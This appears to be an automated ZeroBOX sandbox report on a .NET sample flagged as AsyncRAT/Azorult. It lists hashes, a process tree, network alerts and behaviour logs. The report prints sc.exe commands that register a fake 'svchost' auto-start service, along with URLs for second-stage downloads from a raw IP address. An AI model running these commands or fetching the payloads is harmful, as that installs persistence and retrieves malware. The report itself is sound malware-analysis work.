Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	Nov. 2, 2021, 11 a.m.	Nov. 2, 2021, 11:16 a.m.

Size	18.0KB
Type	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
MD5	`b118cd4261d84677a25e74b02aee6b5d`
SHA256	`77343c97fc962ac5d6528a1928435fd3178dc8df00d8880f403883cd8a48133a`
CRC32	`19AB06BC`
ssdeep	`384:+4zS0CJySmOS8NNMk++Tt+ynFHuuP6sfU:+h0CEFOS/k3Qh`
PDB Path	D:\.000.Private\000.NET\VvMain\q0\4.0\VvFile\VvFile\obj\Release\v.pdb
Yara	PE_Header_Zero - PE File Signature Generic_Malware_Zero - Generic Malware IsPE32 - (no description) Is_DotNET_EXE - (no description) Win_Backdoor_AsyncRAT_Zero - Win Backdoor AsyncRAT Win32_Trojan_PWS_Net_1_Zero - Win32 Trojan PWS .NET Azorult

vcredist_2010.exe "C:\Users\test22\AppData\Local\Temp\vcredist_2010.exe"
2780
- WinPcap_4_1_3.exe "C:\Users\test22\AppData\Roaming\Microsoft\Windows\WinPcap_4_1_3.exe"
  2572
  - net.exe net start npf
    1908
    - net1.exe C:\Windows\system32\net1 start npf
      2288
- vcredist_2010_x64.exe "C:\Users\test22\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe" /q /norestart
  2936
  - Setup.exe c:\744f5a4e12bd43a5e6e09de85f\Setup.exe /q /norestart
    1604
- vcredist_2013_x64.exe "C:\Users\test22\AppData\Roaming\Microsoft\Windows\vcredist_2013_x64.exe" /q /norestart
  1308
  - vcredist_2013_x64.exe "C:\Users\test22\AppData\Roaming\Microsoft\Windows\vcredist_2013_x64.exe" /q /norestart -burn.unelevated BurnPipe.{5F9AED4F-C0A9-4DEA-8C43-C4F21DAFE2DF} {6EF8A9BB-5B24-48DC-ADBE-1D8CF055AC28} 1308
    1568
- sc.exe "C:\Windows\system32\sc.exe" create svchost binPath= C:\Windows\SysWOW64\RuntimeBroker.exe start= auto DisplayName= svchost
  2136
- sc.exe "C:\Windows\system32\sc.exe" description svchost "이 컴퓨터와 인터넷 또는 원격 네트워크 간의 전화 접속 연결과 가상 사설망(VPN) 연결을 관리합니다. 이 서비스를 사용하지 않으면 이 서비스에 명시적으로 종속된 모든 서비스가 시작되지 않습니다."
  1732
- sc.exe "C:\Windows\system32\sc.exe" start svchost
  2416
explorer.exe C:\Windows\Explorer.EXE
1156

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
113.212.88.60	Active	Moloch
121.254.136.19	Active	Moloch
164.124.101.2	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.101:49163 -> 113.212.88.60:80	2027262	ET INFO Dotted Quad Host ZIP Request	Potentially Bad Traffic
TCP 113.212.88.60:80 -> 192.168.56.101:49163	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 113.212.88.60:80 -> 192.168.56.101:49163	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 192.168.56.101:49163 -> 113.212.88.60:80	2027262	ET INFO Dotted Quad Host ZIP Request	Potentially Bad Traffic
TCP 113.212.88.60:80 -> 192.168.56.101:49163	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 192.168.56.101:49163 -> 113.212.88.60:80	2016141	ET INFO Executable Download from dotted-quad Host	A Network Trojan was detected
TCP 113.212.88.60:80 -> 192.168.56.101:49163	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 113.212.88.60:80 -> 192.168.56.101:49163	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.101:49163 -> 113.212.88.60:80	2016141	ET INFO Executable Download from dotted-quad Host	A Network Trojan was detected
TCP 113.212.88.60:80 -> 192.168.56.101:49163	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 113.212.88.60:80 -> 192.168.56.101:49163	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.101:49163 -> 113.212.88.60:80	2016141	ET INFO Executable Download from dotted-quad Host	A Network Trojan was detected
TCP 192.168.56.101:49163 -> 113.212.88.60:80	2027250	ET INFO Dotted Quad Host DLL Request	Potentially Bad Traffic
TCP 192.168.56.101:49163 -> 113.212.88.60:80	2027250	ET INFO Dotted Quad Host DLL Request	Potentially Bad Traffic
TCP 192.168.56.101:49163 -> 113.212.88.60:80	2027250	ET INFO Dotted Quad Host DLL Request	Potentially Bad Traffic
TCP 192.168.56.101:49163 -> 113.212.88.60:80	2027250	ET INFO Dotted Quad Host DLL Request	Potentially Bad Traffic
TCP 192.168.56.101:49163 -> 113.212.88.60:80	2027250	ET INFO Dotted Quad Host DLL Request	Potentially Bad Traffic

Suricata TLS

No Suricata TLS

Queries for the computername (3 events)

Time & API	Arguments	Status	Return
GetComputerNameW Nov. 2, 2021, 11:01 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 2, 2021, 11:01 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 2, 2021, 11:01 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (5 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Nov. 2, 2021, 11 a.m.			0	0
IsDebuggerPresent Nov. 2, 2021, 11 a.m.			0	0
IsDebuggerPresent Nov. 2, 2021, 11:01 a.m.			0	0
IsDebuggerPresent Nov. 2, 2021, 11:01 a.m.			0	0
IsDebuggerPresent Nov. 2, 2021, 11:01 a.m.			0	0

Command line console output was observed (3 events)

Time & API	Arguments	Status	Return
WriteConsoleW Nov. 2, 2021, 10:54 a.m.	buffer: [SC] CreateService SUCCESS console_handle: 0x0000000000000007	1	1
WriteConsoleW Nov. 2, 2021, 10:54 a.m.	buffer: [SC] ChangeServiceConfig2 SUCCESS console_handle: 0x0000000000000007	1	1
WriteConsoleW Nov. 2, 2021, 10:54 a.m.	buffer: SERVICE_NAME: svchost TYPE : 10 WIN32_OWN_PROCESS STATE : 2 START_PENDING (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x7d0 PID : 2104 FLAGS : console_handle: 0x0000000000000007	1	1

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid

This executable has a PDB path (1 event)

pdb_path

D:\.000.Private\000.NET\VvMain\q0\4.0\VvFile\VvFile\obj\Release\v.pdb

Tries to locate where the browsers are installed (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\BundlePatchCode

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Nov. 2, 2021, 11 a.m.		1	1	0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (12 events)

suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://113.212.88.60/Vv/1/RuntimeBroker_64.zip
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://113.212.88.60/Vv/1/RuntimeBrokerBin_64.zip
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://113.212.88.60/Vv/1/WinPcap_4_1_3.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://113.212.88.60/Vv/1/vcredist_2010_x64.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://113.212.88.60/Vv/1/vcredist_2013_x64.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://113.212.88.60/Vv/1/PcapDotNet.Base_64.dll
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://113.212.88.60/Vv/1/PcapDotNet.Core_64.dll
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://113.212.88.60/Vv/1/PcapDotNet.Core.Extensions_64.dll
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://113.212.88.60/Vv/1/PcapDotNet.Packets_64.dll
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://113.212.88.60/Vv/1/PcapDotNet.Analysis_64.dll
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://113.212.88.60/Vv/resource.json
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://113.212.88.60/Vv/1/process.json

Performs some HTTP requests (15 events)

request	GET http://113.212.88.60/Vv/1/RuntimeBroker_64.zip
request	GET http://113.212.88.60/Vv/1/RuntimeBrokerBin_64.zip
request	GET http://113.212.88.60/Vv/1/WinPcap_4_1_3.exe
request	GET http://113.212.88.60/Vv/1/vcredist_2010_x64.exe
request	GET http://113.212.88.60/Vv/1/vcredist_2013_x64.exe
request	GET http://113.212.88.60/Vv/1/PcapDotNet.Base_64.dll
request	GET http://113.212.88.60/Vv/1/PcapDotNet.Core_64.dll
request	GET http://113.212.88.60/Vv/1/PcapDotNet.Core.Extensions_64.dll
request	GET http://113.212.88.60/Vv/1/PcapDotNet.Packets_64.dll
request	GET http://113.212.88.60/Vv/1/PcapDotNet.Analysis_64.dll
request	GET http://crl.microsoft.com/pki/crl/products/microsoftrootcert.crl
request	GET http://crl.microsoft.com/pki/crl/products/MicCodSigPCA_08-31-2010.crl
request	GET http://crl.microsoft.com/pki/crl/products/MicrosoftTimeStampPCA.crl
request	GET http://113.212.88.60/Vv/resource.json
request	GET http://113.212.88.60/Vv/1/process.json

Allocates read-write-execute memory (usually to unpack itself) (50 out of 101 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Nov. 2, 2021, 11 a.m.	process_identifier: 2780 region_size: 1441792 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000620000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 2, 2021, 11 a.m.	process_identifier: 2780 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000700000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 2, 2021, 11 a.m.	process_identifier: 2780 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef40a1000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 2, 2021, 11 a.m.	process_identifier: 2780 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef473b000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 2, 2021, 11 a.m.	process_identifier: 2780 region_size: 1900544 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000001f40000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 2, 2021, 11 a.m.	process_identifier: 2780 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000002090000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 2, 2021, 11 a.m.	process_identifier: 2780 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef40a2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 2, 2021, 11 a.m.	process_identifier: 2780 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef40a2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 2, 2021, 11 a.m.	process_identifier: 2780 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef40a2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 2, 2021, 11 a.m.	process_identifier: 2780 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef40a2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 2, 2021, 11 a.m.	process_identifier: 2780 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef40a2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 2, 2021, 11 a.m.	process_identifier: 2780 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef40a2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 2, 2021, 11 a.m.	process_identifier: 2780 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef40a2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 2, 2021, 11 a.m.	process_identifier: 2780 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef40a2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 2, 2021, 11 a.m.	process_identifier: 2780 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef40a2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 2, 2021, 11 a.m.	process_identifier: 2780 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef40a2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 2, 2021, 11 a.m.	process_identifier: 2780 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef40a2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 2, 2021, 11 a.m.	process_identifier: 2780 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef40a4000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 2, 2021, 11 a.m.	process_identifier: 2780 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef40a4000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 2, 2021, 11 a.m.	process_identifier: 2780 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef40a4000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 2, 2021, 11 a.m.	process_identifier: 2780 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef40a4000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 2, 2021, 11 a.m.	process_identifier: 2780 region_size: 655360 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 2, 2021, 11 a.m.	process_identifier: 2780 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 2, 2021, 11 a.m.	process_identifier: 2780 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 2, 2021, 11 a.m.	process_identifier: 2780 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff20000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 2, 2021, 11 a.m.	process_identifier: 2780 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff00000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 2, 2021, 11 a.m.	process_identifier: 2780 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff00000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 2, 2021, 11 a.m.	process_identifier: 2780 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe948fa000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 2, 2021, 11 a.m.	process_identifier: 2780 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe949ac000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 2, 2021, 11 a.m.	process_identifier: 2780 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe949d6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 2, 2021, 11 a.m.	process_identifier: 2780 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe949b0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 2, 2021, 11 a.m.	process_identifier: 2780 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe9490c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 2, 2021, 11 a.m.	process_identifier: 2780 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe94a20000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 2, 2021, 11 a.m.	process_identifier: 2780 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe9490a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 2, 2021, 11 a.m.	process_identifier: 2780 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe9491b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 2, 2021, 11 a.m.	process_identifier: 2780 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe9494c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 2, 2021, 11 a.m.	process_identifier: 2780 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe9491d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 2, 2021, 11 a.m.	process_identifier: 2780 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe948f2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 2, 2021, 11 a.m.	process_identifier: 2780 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe9490b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 2, 2021, 11 a.m.	process_identifier: 2780 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe94a60000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 2, 2021, 11 a.m.	process_identifier: 2780 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe94a61000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 2, 2021, 11 a.m.	process_identifier: 2780 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe948fb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 2, 2021, 11 a.m.	process_identifier: 2780 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe94a62000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 2, 2021, 11 a.m.	process_identifier: 2780 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000000007391c000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 2, 2021, 11:01 a.m.	process_identifier: 2780 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe94a63000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 2, 2021, 11:01 a.m.	process_identifier: 2780 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe94a64000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 2, 2021, 11:01 a.m.	process_identifier: 2780 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe94a65000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 2, 2021, 11:01 a.m.	process_identifier: 2780 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe94a66000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 2, 2021, 11:01 a.m.	process_identifier: 2780 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe94a67000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 2, 2021, 11:01 a.m.	process_identifier: 2780 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe94a68000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1

Queries the disk size which could be used to detect virtual machine with small fixed size or dynamic allocation (3 events)

Time & API	Arguments	Status	Return
GetDiskFreeSpaceW Nov. 2, 2021, 11:01 a.m.	number_of_free_clusters: 3345680 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: c:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceExW Nov. 2, 2021, 11:01 a.m.	total_number_of_free_bytes: 13695119360 free_bytes_available: 13695119360 root_path: C:\ total_number_of_bytes: 34252779520	1	1
GetDiskFreeSpaceExW Nov. 2, 2021, 11:01 a.m.	total_number_of_free_bytes: 13694599168 free_bytes_available: 13694599168 root_path: C:\ total_number_of_bytes: 34252779520	1	1

Creates executable files on the filesystem (38 events)

file	c:\744f5a4e12bd43a5e6e09de85f\2052\SetupResources.dll
file	c:\744f5a4e12bd43a5e6e09de85f\1042\SetupResources.dll
file	C:\Users\test22\AppData\Local\Temp\{ea14036a-96ff-4c95-a988-78d36f0ccffa}\.ba1\wixstdba.dll
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\WinPcap_4_1_3.exe
file	C:\Windows\SysWOW64\RuntimeBroker.exe
file	c:\744f5a4e12bd43a5e6e09de85f\vc_red.msi
file	c:\744f5a4e12bd43a5e6e09de85f\1028\SetupResources.dll
file	c:\744f5a4e12bd43a5e6e09de85f\1049\SetupResources.dll
file	c:\744f5a4e12bd43a5e6e09de85f\1031\SetupResources.dll
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\system32\PcapDotNet.Packets.dll
file	C:\Program Files (x86)\WinPcap\rpcapd.exe
file	c:\744f5a4e12bd43a5e6e09de85f\1036\SetupResources.dll
file	C:\Program Files (x86)\WinPcap\Uninstall.exe
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe
file	c:\744f5a4e12bd43a5e6e09de85f\1040\SetupResources.dll
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\system32\PcapDotNet.Core.dll
file	c:\744f5a4e12bd43a5e6e09de85f\sqmapi.dll
file	C:\Users\test22\AppData\Local\Temp\nsd192C.tmp\UserInfo.dll
file	c:\744f5a4e12bd43a5e6e09de85f\1033\SetupResources.dll
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\system32\PcapDotNet.Core.Extensions.dll
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinPcap\Uninstall WinPcap 4.1.3.lnk
file	c:\744f5a4e12bd43a5e6e09de85f\SetupEngine.dll
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\system32\PcapDotNet.Analysis.dll
file	c:\744f5a4e12bd43a5e6e09de85f\SetupUi.dll
file	C:\Users\test22\AppData\Local\Temp\nsd192C.tmp\System.dll
file	c:\744f5a4e12bd43a5e6e09de85f\1041\SetupResources.dll
file	C:\Users\test22\AppData\Local\Temp\nsd192C.tmp\ExecDos.dll
file	C:\Program Files (x86)\WinPcap\WinPcapInstall.dll
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\system32\RuntimeBroker.exe
file	C:\Windows\System32\Packet.dll
file	C:\Windows\System32\wpcap.dll
file	C:\Users\test22\AppData\Local\Temp\nsd192C.tmp\InstallOptions.dll
file	c:\744f5a4e12bd43a5e6e09de85f\3082\SetupResources.dll
file	C:\Users\test22\AppData\Local\Temp\{ea14036a-96ff-4c95-a988-78d36f0ccffa}\.be\vcredist_x64.exe
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\system32\PcapDotNet.Base.dll
file	c:\744f5a4e12bd43a5e6e09de85f\Setup.exe
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\vcredist_2013_x64.exe
file	C:\Windows\System32\pthreadVC.dll

Creates hidden or system file (1 event)

Time & API	Arguments	Status	Return	Repeated
